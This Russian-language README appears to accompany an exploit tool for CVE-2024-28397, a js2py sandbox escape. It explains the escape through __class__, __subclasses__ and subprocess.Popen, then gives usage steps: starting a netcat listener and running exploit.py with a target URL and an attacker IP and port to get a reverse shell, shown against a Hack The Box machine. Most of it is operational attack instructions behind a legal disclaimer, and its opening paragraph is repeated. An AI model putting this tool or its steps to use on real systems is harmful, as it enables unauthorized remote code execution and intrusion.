
Скрипт автоматизации на Python для эксплуатации уязвимости **js2py Sandbox Escape** (CVE-2024-28397). Этот инструмент автоматизирует процесс генерации и доставки полезной нагрузки для достижения удалённого выполнения кода (RCE) на уязвимых экземплярах.
Python-скрипт для автоматизации эксплуатации уязвимости js2py Sandbox Escape (CVE-2024-28397). Этот инструмент автоматизирует процесс генерации и доставки полезной нагрузки для достижения удалённого выполнения кода (RCE) на уязвимых экземплярах.
⚠️ Правовое предупреждение Использование этого инструмента для атак на цели без предварительного обоюдного согласия незаконно. Этот репозиторий предназначен только для образовательных целей. Автор не несёт ответственности за любое неправомерное использование этой информации. Инструмент предназначен для использования в авторизованных оценках безопасности и средах Capture The Flag (CTF).
CVE-2024-28397 затрагивает библиотеку js2py (версии < 0.74). Библиотека не обеспечивает должную изоляцию среды JavaScript от среды хоста Python.
__class__ и __subclasses__.subprocess.Popen, что позволяет выполнять произвольные команды на сервере.pip install requests
Запустите ваш Netcat-слушатель :
nc -lvnp 1337
Запустите скрипт :
python3 exploit.py -u <target url> -i <attacker ip> -p <attacker port>
Вот инструмент в действии против уязвимой цели (Hack The Box — CodeTwo):
Запуск эксплойта для генерации полезной нагрузки и вызова обратного подключения:

Получение обратной оболочки (reverse shell) на слушателе:
